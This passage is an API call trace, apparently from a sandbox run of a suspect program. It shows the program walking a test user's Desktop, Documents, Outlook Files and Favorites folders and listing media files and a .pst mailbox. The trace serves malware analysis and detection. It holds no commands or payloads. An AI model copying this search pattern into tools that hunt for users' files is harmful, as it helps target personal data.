lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafa2960, ftCreationTime.dwHighDateTime=0x1d5bf85, ftLastAccessTime.dwLowDateTime=0x72f2bc10, ftLastAccessTime.dwHighDateTime=0x1d5c1cb, ftLastWriteTime.dwLowDateTime=0x72f2bc10, ftLastWriteTime.dwHighDateTime=0x1d5c1cb, nFileSizeHigh=0x0, nFileSizeLow=0x2b91, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZHTOAxESRSu4ZX.mp3", cAlternateFileName="ZHTOAX~1.MP3")) returned 0 [0094.307] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0094.307] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.307] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NcPu25RMbC\\") returned="NcPu25RMbC\\" [0094.307] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0094.307] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0094.307] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0094.307] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.307] PathFindFileNameW (pszPath="") returned="" [0094.307] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NcPu25RMbC\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf53a0610, ftCreationTime.dwHighDateTime=0x1d5bb86, ftLastAccessTime.dwLowDateTime=0x43998df0, ftLastAccessTime.dwHighDateTime=0x1d5ba04, ftLastWriteTime.dwLowDateTime=0x43998df0, ftLastWriteTime.dwHighDateTime=0x1d5ba04, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0094.307] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf53a0610, ftCreationTime.dwHighDateTime=0x1d5bb86, ftLastAccessTime.dwLowDateTime=0x43998df0, ftLastAccessTime.dwHighDateTime=0x1d5ba04, ftLastWriteTime.dwLowDateTime=0x43998df0, ftLastWriteTime.dwHighDateTime=0x1d5ba04, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.307] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5008cb0, ftCreationTime.dwHighDateTime=0x1d5bd66, ftLastAccessTime.dwLowDateTime=0x2009b1a0, ftLastAccessTime.dwHighDateTime=0x1d5b9d0, ftLastWriteTime.dwLowDateTime=0x2009b1a0, ftLastWriteTime.dwHighDateTime=0x1d5b9d0, nFileSizeHigh=0x0, nFileSizeLow=0x14522, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gxHYHDN.mp3", cAlternateFileName="")) returned 1 [0094.307] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74453210, ftCreationTime.dwHighDateTime=0x1d5c44f, ftLastAccessTime.dwLowDateTime=0x11276420, ftLastAccessTime.dwHighDateTime=0x1d5bf2f, ftLastWriteTime.dwLowDateTime=0x11276420, ftLastWriteTime.dwHighDateTime=0x1d5bf2f, nFileSizeHigh=0x0, nFileSizeLow=0x174c7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="J12HLygy.wav", cAlternateFileName="")) returned 1 [0094.307] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cb5eab0, ftCreationTime.dwHighDateTime=0x1d5b917, ftLastAccessTime.dwLowDateTime=0x24543a50, ftLastAccessTime.dwHighDateTime=0x1d5c399, ftLastWriteTime.dwLowDateTime=0x24543a50, ftLastWriteTime.dwHighDateTime=0x1d5c399, nFileSizeHigh=0x0, nFileSizeLow=0x148a8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LSUYyXvsq.png", cAlternateFileName="LSUYYX~1.PNG")) returned 1 [0094.307] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cb5eab0, ftCreationTime.dwHighDateTime=0x1d5b917, ftLastAccessTime.dwLowDateTime=0x24543a50, ftLastAccessTime.dwHighDateTime=0x1d5c399, ftLastWriteTime.dwLowDateTime=0x24543a50, ftLastWriteTime.dwHighDateTime=0x1d5c399, nFileSizeHigh=0x0, nFileSizeLow=0x148a8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LSUYyXvsq.png", cAlternateFileName="LSUYYX~1.PNG")) returned 0 [0094.308] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0094.308] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.308] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pwaY\\") returned="pwaY\\" [0094.308] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0094.308] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0094.308] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0094.308] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.308] PathFindFileNameW (pszPath="") returned="" [0094.308] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pwaY\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xebd89e40, ftCreationTime.dwHighDateTime=0x1d5bb1f, ftLastAccessTime.dwLowDateTime=0x4130c530, ftLastAccessTime.dwHighDateTime=0x1d5c592, ftLastWriteTime.dwLowDateTime=0x4130c530, ftLastWriteTime.dwHighDateTime=0x1d5c592, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0094.308] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xebd89e40, ftCreationTime.dwHighDateTime=0x1d5bb1f, ftLastAccessTime.dwLowDateTime=0x4130c530, ftLastAccessTime.dwHighDateTime=0x1d5c592, ftLastWriteTime.dwLowDateTime=0x4130c530, ftLastWriteTime.dwHighDateTime=0x1d5c592, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.308] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed5b43f0, ftCreationTime.dwHighDateTime=0x1d5c130, ftLastAccessTime.dwLowDateTime=0xb5586bd0, ftLastAccessTime.dwHighDateTime=0x1d5c564, ftLastWriteTime.dwLowDateTime=0xb5586bd0, ftLastWriteTime.dwHighDateTime=0x1d5c564, nFileSizeHigh=0x0, nFileSizeLow=0x855e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="36xpR72G.avi", cAlternateFileName="")) returned 1 [0094.308] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5272e00, ftCreationTime.dwHighDateTime=0x1d5c50e, ftLastAccessTime.dwLowDateTime=0xebb36280, ftLastAccessTime.dwHighDateTime=0x1d5c3b0, ftLastWriteTime.dwLowDateTime=0xebb36280, ftLastWriteTime.dwHighDateTime=0x1d5c3b0, nFileSizeHigh=0x0, nFileSizeLow=0x155c2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="c9ton.xls", cAlternateFileName="")) returned 1 [0094.308] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8ddb250, ftCreationTime.dwHighDateTime=0x1d5c54d, ftLastAccessTime.dwLowDateTime=0xf55b4610, ftLastAccessTime.dwHighDateTime=0x1d5c0de, ftLastWriteTime.dwLowDateTime=0xf55b4610, ftLastWriteTime.dwHighDateTime=0x1d5c0de, nFileSizeHigh=0x0, nFileSizeLow=0x13bc9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HwzIFfRvkMh98zM1.avi", cAlternateFileName="HWZIFF~1.AVI")) returned 1 [0094.309] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6bccac50, ftCreationTime.dwHighDateTime=0x1d5c4e8, ftLastAccessTime.dwLowDateTime=0xb1b8acd0, ftLastAccessTime.dwHighDateTime=0x1d5c0a3, ftLastWriteTime.dwLowDateTime=0xb1b8acd0, ftLastWriteTime.dwHighDateTime=0x1d5c0a3, nFileSizeHigh=0x0, nFileSizeLow=0x5be6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qdLGdkG.gif", cAlternateFileName="")) returned 1 [0094.309] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x117779f0, ftCreationTime.dwHighDateTime=0x1d5b5ad, ftLastAccessTime.dwLowDateTime=0x45bfd5f0, ftLastAccessTime.dwHighDateTime=0x1d5c2ef, ftLastWriteTime.dwLowDateTime=0x45bfd5f0, ftLastWriteTime.dwHighDateTime=0x1d5c2ef, nFileSizeHigh=0x0, nFileSizeLow=0x148b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rUjsNXVZqyJ.ots", cAlternateFileName="RUJSNX~1.OTS")) returned 1 [0094.309] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x117779f0, ftCreationTime.dwHighDateTime=0x1d5b5ad, ftLastAccessTime.dwLowDateTime=0x45bfd5f0, ftLastAccessTime.dwHighDateTime=0x1d5c2ef, ftLastWriteTime.dwLowDateTime=0x45bfd5f0, ftLastWriteTime.dwHighDateTime=0x1d5c2ef, nFileSizeHigh=0x0, nFileSizeLow=0x148b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rUjsNXVZqyJ.ots", cAlternateFileName="RUJSNX~1.OTS")) returned 0 [0094.309] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0094.309] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.309] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\") returned="My Music\\" [0094.309] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0094.309] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0094.309] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0094.309] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.309] PathFindFileNameW (pszPath="") returned="" [0094.309] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x117779f0, ftCreationTime.dwHighDateTime=0x1d5b5ad, ftLastAccessTime.dwLowDateTime=0x45bfd5f0, ftLastAccessTime.dwHighDateTime=0x1d5c2ef, ftLastWriteTime.dwLowDateTime=0x45bfd5f0, ftLastWriteTime.dwHighDateTime=0x1d5c2ef, nFileSizeHigh=0x0, nFileSizeLow=0x148b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rUjsNXVZqyJ.ots", cAlternateFileName="RUJSNX~1.OTS")) returned 0xffffffff [0094.309] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.309] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\") returned="My Pictures\\" [0094.310] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0094.310] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0094.310] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0094.310] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.310] PathFindFileNameW (pszPath="") returned="" [0094.310] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x117779f0, ftCreationTime.dwHighDateTime=0x1d5b5ad, ftLastAccessTime.dwLowDateTime=0x45bfd5f0, ftLastAccessTime.dwHighDateTime=0x1d5c2ef, ftLastWriteTime.dwLowDateTime=0x45bfd5f0, ftLastWriteTime.dwHighDateTime=0x1d5c2ef, nFileSizeHigh=0x0, nFileSizeLow=0x148b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rUjsNXVZqyJ.ots", cAlternateFileName="RUJSNX~1.OTS")) returned 0xffffffff [0094.310] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.310] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="My Shapes\\" [0094.310] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0094.310] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0094.310] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0094.311] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.311] PathFindFileNameW (pszPath="") returned="" [0094.311] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0094.312] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.312] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0094.312] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9e9e4460, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9e9e4460, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites.vss", cAlternateFileName="FAVORI~1.VSS")) returned 1 [0094.312] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 1 [0094.312] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0 [0094.312] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0094.312] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.312] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\") returned="My Videos\\" [0094.312] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0094.312] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0094.312] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0094.312] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.312] PathFindFileNameW (pszPath="") returned="" [0094.312] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0xffffffff [0094.312] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.313] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="Outlook Files\\" [0094.313] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0094.313] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0094.313] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0094.313] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.313] PathFindFileNameW (pszPath="") returned="" [0094.313] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0094.313] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.313] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6228cf40, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 1 [0094.313] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6228cf40, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 0 [0094.313] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0094.314] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.314] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="Links\\" [0094.314] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0094.314] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0094.314] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0094.314] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.314] PathFindFileNameW (pszPath="") returned="" [0094.314] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0094.314] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.314] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0094.314] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52cd1930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52fcb4b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Suggested Sites.url", cAlternateFileName="SUGGES~1.URL")) returned 1 [0094.314] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0094.314] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0 [0094.314] FindClose (in: hFindFile=0x670618 | out: 